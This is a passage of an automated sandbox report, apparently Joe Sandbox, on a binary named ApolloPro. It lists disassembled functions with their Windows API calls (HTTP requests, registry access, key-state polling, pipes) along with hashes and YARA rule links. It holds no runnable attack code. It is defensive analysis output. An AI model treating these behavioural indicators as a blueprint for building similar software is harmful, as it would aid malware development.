                                                                                              • Opcode ID: 3f883a190f3ffbd7f95abdcbb8f701180ea4a73f824cd097cc94e69c005cd968
                                                                                              • Instruction ID: 5a5b75108794e3c770b063fe5c7f861834c24639294800f315fb084fc24470e7
                                                                                              • Opcode Fuzzy Hash: 3f883a190f3ffbd7f95abdcbb8f701180ea4a73f824cd097cc94e69c005cd968
                                                                                              • Instruction Fuzzy Hash: 8D21E171A01104AFDB54ABB0DC86DFFB7AADF46360F14421AF825A72D1DB384D4A9720
                                                                                              Function 006A1EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006A1F18
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006A1F3E
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006A1F6E
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 006A1FB5
                                                                                                • Part of subcall function 006A2B4F: GetLastError.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B64
                                                                                                • Part of subcall function 006A2B4F: SetEvent.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 471bd20a465114ff1edaf6162aa9e3a838236ab1aa4bc7b158432740e168208c
                                                                                              • Instruction ID: d5cc5ddfcb9170fef63bd3ac47759623fb0e54000e240681ca6766e8feea8854
                                                                                              • Opcode Fuzzy Hash: 471bd20a465114ff1edaf6162aa9e3a838236ab1aa4bc7b158432740e168208c
                                                                                              • Instruction Fuzzy Hash: DA219FB5604208BFE711AF64CC95EBF77EFEB4AB84F10411AF405AA240DB249D059FB5
                                                                                              Function 006B6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00632111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                                • Part of subcall function 00632111: GetStockObject.GDI32(00000011), ref: 00632163
                                                                                                • Part of subcall function 00632111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006B6A86
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 006B6A8D
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006B6AA2
                                                                                              • DestroyWindow.USER32(?), ref: 006B6AAA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 4146253029-1011021900
                                                                                              • Opcode ID: ebdcad0bef41da65a41fb3454af960a239adaa42441ebf91d862303d0499ac45
                                                                                              • Instruction ID: be36d37d8216f21321882f7db528ee95e8f06f2e0c81923e88ef9618fc65f490
                                                                                              • Opcode Fuzzy Hash: ebdcad0bef41da65a41fb3454af960a239adaa42441ebf91d862303d0499ac45
                                                                                              • Instruction Fuzzy Hash: 4721AEB1200209AFEF108F64DC80EFB77AEEF59324F149619FA51A2290D375DC9197A0
                                                                                              Function 00697357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00697377
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006973AA
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 006973BC
                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006973F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: 3afe1c30f7eda20b4f8d5ca1ad0fdc2da99b4175a0bc6280ce0c76b18831a1a1
                                                                                              • Instruction ID: 24f13ff5732f9820bdc4f160fa850888029a0ca68d1809b391f8d2949b77c368
                                                                                              • Opcode Fuzzy Hash: 3afe1c30f7eda20b4f8d5ca1ad0fdc2da99b4175a0bc6280ce0c76b18831a1a1
                                                                                              • Instruction Fuzzy Hash: 61218E70518306EBDF209F69DC05EEA7BEAAF54720F204A29FCA0D76D0D7709951DB50
                                                                                              Function 00697425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00697444
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00697476
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00697487
                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006974C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: 2a6a07e7d96ca6b2edbd569381d79ed588d80569fd335ea014436d35f72bfa94
                                                                                              • Instruction ID: af33eb8b516ab305f40ff36a8df7f1914a528acd69de33ebeedfafc358a560dd
                                                                                              • Opcode Fuzzy Hash: 2a6a07e7d96ca6b2edbd569381d79ed588d80569fd335ea014436d35f72bfa94
                                                                                              • Instruction Fuzzy Hash: BD21C1316183069BDF209F689C44EAA7BEEAF55B30F200B19F9A0D77D1DB709941CB51
                                                                                              Function 0069B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0069B297
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0069B2EB
                                                                                              • __swprintf.LIBCMT ref: 0069B304
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,006C0980), ref: 0069B342
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                              • String ID: %lu
                                                                                              • API String ID: 3164766367-685833217
                                                                                              • Opcode ID: 31f9df2a8411eee17ca2ff09d037a3ab4209df9b604b18aec0958f90a2a28a2c
                                                                                              • Instruction ID: dd95f387846cc1970cbbea263dcf63882ca8979bbbfde126a7f1d62dd60f1857
                                                                                              • Opcode Fuzzy Hash: 31f9df2a8411eee17ca2ff09d037a3ab4209df9b604b18aec0958f90a2a28a2c
                                                                                              • Instruction Fuzzy Hash: 8C216031A00108AFCB50EFA5CC85EAEB7B9EF89704F144069F905DB252DB31EA45CB61
                                                                                              Function 0068AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                                • Part of subcall function 0068AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0068AA6F
                                                                                                • Part of subcall function 0068AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0068AA82
                                                                                                • Part of subcall function 0068AA52: GetCurrentThreadId.KERNEL32 ref: 0068AA89
                                                                                                • Part of subcall function 0068AA52: AttachThreadInput.USER32(00000000), ref: 0068AA90
                                                                                              • GetFocus.USER32 ref: 0068AC2A
                                                                                                • Part of subcall function 0068AA9B: GetParent.USER32(?), ref: 0068AAA9
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0068AC73
                                                                                              • EnumChildWindows.USER32(?,0068ACEB), ref: 0068AC9B
                                                                                              • __swprintf.LIBCMT ref: 0068ACB5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                              • String ID: %s%d
                                                                                              • API String ID: 1941087503-1110647743
                                                                                              • Opcode ID: c55727291502266f621fe21f176a782b207ee141e9a40829a603c27857a6b32b
                                                                                              • Instruction ID: ca8f396c17512e8a0ce28f70641dede2f24fb91fdb24a20dcb9b6777ebb1d9bb
                                                                                              • Opcode Fuzzy Hash: c55727291502266f621fe21f176a782b207ee141e9a40829a603c27857a6b32b
                                                                                              • Instruction Fuzzy Hash: 7911E474200204ABEF51BFE0CD86FEA376EAB44700F00417AFE08AA142CB705945CB75
                                                                                              Function 006922E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00692318
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                              • API String ID: 3964851224-769500911
                                                                                              • Opcode ID: 7ff127af76aab0ce7f883bfd05f4ab1916458183bafbd6422acd8a08638b4776
                                                                                              • Instruction ID: de0c602e60d293b775fff6c4504a72ab20688c5ea17bd2b963801bc54e375c4f
                                                                                              • Opcode Fuzzy Hash: 7ff127af76aab0ce7f883bfd05f4ab1916458183bafbd6422acd8a08638b4776
                                                                                              • Instruction Fuzzy Hash: A5115E30900219DFCF40EF94D9A14EEB7BAFF16344F108569D81467751EB369D0ACB50
                                                                                              Function 006AF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006AF2F0
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006AF320
                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 006AF453
                                                                                              • CloseHandle.KERNEL32(?), ref: 006AF4D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2364364464-0
                                                                                              • Opcode ID: d43c6aaf4b0deed3e16f1c38561d46bd017eeae511ef670b29fdc6d8b982cf83
                                                                                              • Instruction ID: 4180413682cffadd1b0620cf1ac5df3a5b536e6ac7bc7ec16cafdf7bbba20bb4
                                                                                              • Opcode Fuzzy Hash: d43c6aaf4b0deed3e16f1c38561d46bd017eeae511ef670b29fdc6d8b982cf83
                                                                                              • Instruction Fuzzy Hash: AF818F716003009FD760EF68D846F2AF7E6AF48710F14892DF9999B392DB70AD008F96
                                                                                              Function 006B0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B075D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B079C
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006B07E3
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 006B080F
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 006B081C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3440857362-0
                                                                                              • Opcode ID: 40824f5dfca8f42a01bd9def12668e9f6d89fecee36ad5aa23befcc956111ea5
                                                                                              • Instruction ID: 713eecbe91d3f9968e14bd7c93027341b08ca12e98b4060497c01897b6e3dd7d
                                                                                              • Opcode Fuzzy Hash: 40824f5dfca8f42a01bd9def12668e9f6d89fecee36ad5aa23befcc956111ea5
                                                                                              • Instruction Fuzzy Hash: 42517C71208204AFD744EF64C891FABBBEAFF85304F04492DF59587291DB30E945CB56
                                                                                              Function 0069EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0069EC62
                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0069EC8B
                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0069ECCA
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0069ECEF
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0069ECF7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1389676194-0
                                                                                              • Opcode ID: 36d820adee40e8fc8c664cfb17baf0fcbb1f7f643f45b8b411a4a927e66adbae
                                                                                              • Instruction ID: 7f7ba7efec2276d361843151a6ebf49224e20c0ff88bab149576f67ad24f6701
                                                                                              • Opcode Fuzzy Hash: 36d820adee40e8fc8c664cfb17baf0fcbb1f7f643f45b8b411a4a927e66adbae
                                                                                              • Instruction Fuzzy Hash: 1A512835A00105DFDB41EF64C985AAEBBF6EF09310F188099E849AB3A1CB35ED51DF94
                                                                                              Function 006BA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8db9d6e6ecf10fa8fde75790d2eabe36eab5ee61ae517b8c4508737c86e8269
                                                                                              • Instruction ID: 34b3cb0c613700b48cc7beee690b0c26db70a38826a503065bba9f676fdd0faf
                                                                                              • Opcode Fuzzy Hash: d8db9d6e6ecf10fa8fde75790d2eabe36eab5ee61ae517b8c4508737c86e8269
                                                                                              • Instruction Fuzzy Hash: 2141B3B9908214AFD720DFA8CC48FF9BBB7EB0A350F140175E916A72D1DA709D81DB51
                                                                                              Function 00632714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00632727
                                                                                              • ScreenToClient.USER32(006F77B0,?), ref: 00632744
                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00632769
                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 00632777
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              • Opcode ID: 8a02f6a345cd53fe0b8af15fbf4eb3cb96c42458bea7d6756e4286c4ac59f9d4
                                                                                              • Instruction ID: 99e2d3e253ec17e091253e198e8880f98c332250b7e4b2416f6a970765c2dd2f
                                                                                              • Opcode Fuzzy Hash: 8a02f6a345cd53fe0b8af15fbf4eb3cb96c42458bea7d6756e4286c4ac59f9d4
                                                                                              • Instruction Fuzzy Hash: FB416C7550450AFBDF159F69C844AF9BB76FB05334F10832AF868A22A0CB31AD90DBD1
                                                                                              Function 006895D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 006895E8
                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00689692
                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0068969A
                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 006896A8
                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006896B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: ba5d98e5d6ca34d0204e1bff9e92e7e3e476b218c392956187359fca1ae0398a
                                                                                              • Instruction ID: 9f5024355aa7a8945e0ef3418a7a91fc13a9d1c4c06e7c33a919e4f55d086f56
                                                                                              • Opcode Fuzzy Hash: ba5d98e5d6ca34d0204e1bff9e92e7e3e476b218c392956187359fca1ae0398a
                                                                                              • Instruction Fuzzy Hash: 8B31DC71900219EFEB14DFA8D94CAEE7BB6EB44315F144218F924AA2D0D3B09960CBA0
                                                                                              Function 0068BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0068BD9D
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0068BDBA
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0068BDF2
                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0068BE18
                                                                                              • _wcsstr.LIBCMT ref: 0068BE22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 3902887630-0
                                                                                              • Opcode ID: ac7f961fc1cd60ee7579456d5140b4b0322996bce1a13d8b0bd928814b49cc0b
                                                                                              • Instruction ID: accf9ed6efdf88c7ba29f012b81e72a3eac862fc709de33c41266b8865ce4bc1
                                                                                              • Opcode Fuzzy Hash: ac7f961fc1cd60ee7579456d5140b4b0322996bce1a13d8b0bd928814b49cc0b
